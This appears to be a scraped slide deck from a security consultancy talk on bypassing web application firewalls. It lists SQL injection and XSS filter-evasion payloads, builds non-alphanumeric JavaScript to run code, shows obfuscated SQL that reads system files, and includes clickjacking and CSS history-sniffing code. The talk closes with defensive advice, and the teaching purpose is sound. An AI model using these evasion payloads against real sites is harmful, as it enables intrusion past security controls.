Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 

Bypassing Web Application Firewalls

  • 1. Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant          www.nethemba.com             www.nethemba.com      
  • 2. Nethemba – All About Security  Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)  Core business: All kinds of penetration tests, comprehensive web  application security audits, local system and wifi security audits, security  consulting, forensic analysis, secure VoIP, ultra­secure systems  OWASP activists: Leaders of Slovak/Czech OWASP chapters, co­authors  of the most recognized OWASP Testing Guide v3.0, working on new version   We are the only one in Slovakia/Czech Republic that offer:  Penetration tests and security audits of SAP  Security audit of smart RFID cards  Unique own and sponsored security research in many areas (see  our references – Vulnerabilities in public transport SMS tickets,    cracked the most used Mifare Classic RFID cards)        www.nethemba.com       
  • 3. What are WAFs?  Emerged from IDS/IPS focused on HTTP  protocol and HTTP related attacks  Usually contain a lot of complex reg­exp rules  to match  Support special features like cookie encryption,  CSRF protection, etc.  Except of free mod_security they are quite  expensive (and often there is no correlation    between the price and their filtering capabilities)         www.nethemba.com       
  • 4. WAFs implementations  Usually they are deployed in “blacklisting mode”  that is more vulnerable to bypasses and  targeted attacks  Application “context” (type of allowed inputs) is  necessary to know for deploying of more secure  “whitelisting mode”  All WAFs can by bypassed  WAF is just a workaround, but from the security    point of view it can be cost­effective        www.nethemba.com       
  • 5. WAF filter rules  Directly reflects WAF effectiveness  For most WAF vendors they are closely  guarded secrets – most determined attackers  are able to bypass them without seeing the  actual rules  Open­source WAFs (mod_security, PHPIDS)  have open source rules which is better for  more scrutiny by skilled penetration testers          www.nethemba.com       
  • 6. Typical WAF bypasses Blocked Attack Undetected modification 'or 1=1-- ' or 2=2-- alert(0) %00alert(0) <script>alert(0)</script> <script type=vbscript>MsgBox(0)</script> ' or ''''='r '/**/OR/**/''''=' <script>alert(0)</script> <img src=”x:x” onerror=”alert(0)”></img> <img src=x:x onerror=alert(0)//></img> <img src=http://url onload=alert(0)//></img> 1 or 1=1 (1)or(1)=(1) eval(name) x=this.name X(0?$:name+1)          www.nethemba.com       
  • 7. Yes, WAF may be also be vulnerable!  WAF also increases the attack surface of a  target organization  WAF may be the target of and vulnerable to  malicious attacks, e.g. XSS, SQL injection,  denial­of­service attacks, remote code  execution vulnerabilities  These vulnerabilities have been found in all  types of WAF products(!)          www.nethemba.com       
  • 8. Typical bypass flow  1. Find out which characters / sequences are  allowed by WAFs 2. Make an obfuscated version of your injected  payload 3. Test it and watch for the WAF/application  response 4. If it does not work, modify it and try step 2.          www.nethemba.com       
  • 9. Javascript obfuscation  Javascript has very powerful features  Javascript payload is used in XSS attacks  It is full of evals, expression closures, generator  expressions, iterators, special characters and  shortcuts  Supports a lot of encodings (unicode –  multibyte characters, hexadecimal, octal,  combination of all of them)   Supports XOR, “Encryption”, Base64        www.nethemba.com       
  • 10. Non­alphanumeric javascript code  Even if only few characters are allowed it is  possible to construct fully functional code:  _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___; $$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"") [$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({} +"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"") [___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({} +"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({} [$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")()    ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](­~Á)           www.nethemba.com       
  • 11. Let's bypass WAF!  Example situation: WAF blocks alpha  characters and numbers (probably not a very  real situation, just proof­of­concept :­)  Allows only few special characters (){}_=[];$”! +<>  Let's generate fully nonalphanumeric javascript  code!           www.nethemba.com       
  • 13. Source of different alphanumeric  characters in Javascript Javascript object / String result error state {}+'' “[object Object]” +[][+[]] “NaN” [][+[]]+[] “undefined” [![]]+[] “false”   [!![]]+[]   “true”      www.nethemba.com       
  • 14. Shortest Possible Ways to Create  Zero without Using Numbers Characters Result +[] 0 +`'` 0 +”`” 0 -[] 0 -`'` 0 -”`” 0          www.nethemba.com       
  • 15. Generating numbers  +[] //0  ++[[]][+[]] //1  +!+[] //1  ++[++[[]][+[]]][+[]] //2  !+[]+!+[] //2  ++[++[++[[]][+[]]][+[]]][+[]] //3  !+[]+!+[]+!+[] //3          www.nethemba.com       
  • 16. Gain alpha characters without  directly using them  When define Javascript object using the object  literal and concatenate with string, the result is  [object Object]  _={}+''; //[object Object]  alert(_[1]) //returns 'o' character          www.nethemba.com       
  • 17. Generate string “alert” without using  any alphanumeric characters  Let's start with 'a'   What Javascript object contains 'a'?   We can use 'NaN' (Not a Number)  Access empty string with index “0” (undefined)  and convert to number (NaN)   +[][+[]] // result: NaN          www.nethemba.com       
  • 18. Generating 'a' character  NaN[1]='a'  ++[[]][+[]] //1  +[][+[]]+[] // result string: NaN  (+[][+[]]+[])[++[[]][+[]]] //a  We have character 'a'          www.nethemba.com       
  • 19. Generating 'l' character  Use boolean false  We can use ! (NOT) operator  e.g. ''==0 //true  Use blank array (string) and then NOT operator  to obtain boolean, wrap with [] and convert it to  string  ([![]]+[]) //string “false”          www.nethemba.com       
  • 20. Generating 'l' character  ++[++[[]][+[]]][+[]] //2  ([![]]+[]) //string “false”  'false'[2] = ([![]]+[])[++[++[[]][+ []]][+[]]] // 'l'    We have 'l' character!          www.nethemba.com       
  • 21. Generating 'e' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'  ++[++[++[[]][+[]]][+[]]][+[]] //3  'true'[3] = ([!![]]+[])[++[++[++ [[]][+[]]][+[]]][+[]]] //e  And we have 'e' character!          www.nethemba.com       
  • 22. Generating 'r' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   ++[[]][+[]] //1  'true'[1] = ([!![]]+[])[++[[]][+ []]] //r  And we have 'r' character!          www.nethemba.com       
  • 23. Generating 't' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   +[] //0  'true'[0] = ([!![]]+[])[+[]] //t  And we have 't' character!          www.nethemba.com       
  • 24. And now we have 'alert' string! (+[][+[]]+[])[++[[]][+[]]]+([![]]+ [])[++[++[[]][+[]]][+[]]]+([!![]]+ [])[++[++[++[[]][+[]]][+[]]][+[]]]+ ([!![]]+[])[++[[]][+[]]]+([!![]]+ [])[+[]] //string 'alert'          www.nethemba.com       
  • 25. How to execute the code of our choice?  It is necessary to return window object to  access all properties of window   If you can access to a constructor, you can  access Function constructor to execute  arbitrary code  The shortest possible way to get window is: alert((1,[].sort)()) // shows  window object !   Works in all browsers except IE        www.nethemba.com       
  • 26. How to generate 'sort' string   We know how to generate string 'alert'  We need to generate 'sort' string 'false'[3]=([![]]+[])[++[++[++[[]] [+[]]][+[]]][+[]]] //'s'   We can gain 'o' from []+{} [object Object] ([]+{})[++[[]][+[]]] //o  We have already generated 'r' and 't'          www.nethemba.com       
  • 28. Let's build it together – call alert(1)  (1,[].sort)().alert(1)  After changing number 1 and all alpha  characters to their obfuscated version we get: ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]] [+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]] +[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+ []]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]] [+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+ ([!![]]+[])[+[]]](++[[]][+[]])    //calls alert(1)!        www.nethemba.com       
  • 29. How to call any arbitrary  Javascript function  Using the array constructor (accessing the  constructor twice from an array object returns  Function): [].constructor.constructor(“alert(1 )”)()   We need to generate the rest 'c','n','u' letters,  gain them from the output of [].sort function:   function sort() { [native code] }        www.nethemba.com       
  • 30. SQL obfuscation  What is obfuscation of SQL injection vector?  Different DBMS have different SQL syntax,  most of them support Unicode, Base64, hex,  octal and binary representation, escaping,  hashing algorithms (MD5, SHA­1)  Many “blacklisted” characters can be replaced  by their functional alternatives (0xA0 in MySQL)  Obfuscated comments – it is difficult to    determine what is a comment and what is not        www.nethemba.com       
  • 31. SQL obfuscation examples  SELECT CONCAT (char  (x'70617373',b'11101110110111101110010011 00100'))  s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1    SELECT  LOAD_FILE(0x633A5C626F6F742E696E69)  (M)   SELECT(extractvalue(0x3C613E61646D696E3   C2F613, 0x2F61))        www.nethemba.com       
  • 32. New SQL features  MySQL/PostgreSQL supports XML functions: SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv');  HTML5 supports local DB storage (SQLite  3.1+) (openDatabase object) – can be misused  for persistent XSS, local SQL injection attacks          www.nethemba.com       
  • 33. Existing obfuscation tools  Hackvertor http://hackvertor.co.uk/public  HackBar  https://addons.mozilla.org/en­US/firefox/addon/hack  Malzilla http://malzilla.sourceforge.net/  Your imagination :)          www.nethemba.com       
  • 34. Summary  WAFs are just workarounds!  The best solution is to care about security in every SDLC  phase and strictly validate all inputs and outputs in the  application  Use whitelisting instead of blacklisting (both in the  application and WAF!)  Use multilayer security ­  3rdlayer database architecture or  database firewalls  for SQL use “prepared” statements    for HTML use HTML Purifier or OWASP AntiSamy project        www.nethemba.com       
  • 35. References  Web Application Obfuscation  http://www.amazon.com/Web­Application­Obfuscati  XSS Attacks: Cross Site Scripting Exploits and  Defense  http://www.amazon.com/XSS­Attacks­Scripting­Exp  Special thanks to Mario Heiderich and Stefano  Di Paola           www.nethemba.com       
  • 36. UI redressing attacks­ clickjacking <style> iframe { filter: alpha(opacity=0); opacity: 0; position: absolute; top: 0px; left 0px; height: 300px; width: 250px; } img { position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; } </style> <img src=”WHAT THE USERS SEES”/> <iframe src=”WHAT THE USER IS ACTUALLY INTERACTING    WITH”></iframe>        www.nethemba.com       
  • 37. Clickjacking protection  Blocks using X­FRAME/OPTIONS: NEVER  <body> <script> if (top!=self)  document.write('<plaintext>'); </script> ...          www.nethemba.com       
  • 38. CSS History attack <style> a { position: relative; } a:visited { position: absolute; } </style> <a id=”v” href=”http://www.google.com/”>Google</a> <script>  var l=document.getElementById(“v”); var c=getComputedStyle(l).position; c==”absolute”?alert(“visited”):alert(“not visited”);   </script>        www.nethemba.com       
  • 39. CSS History exploitation methods  Social network deanonymization attacks  Session ID/CSRF token local brute force attack  LAN scanners  Fixed in Firefox 4.0, current browsers are  vulnerable          www.nethemba.com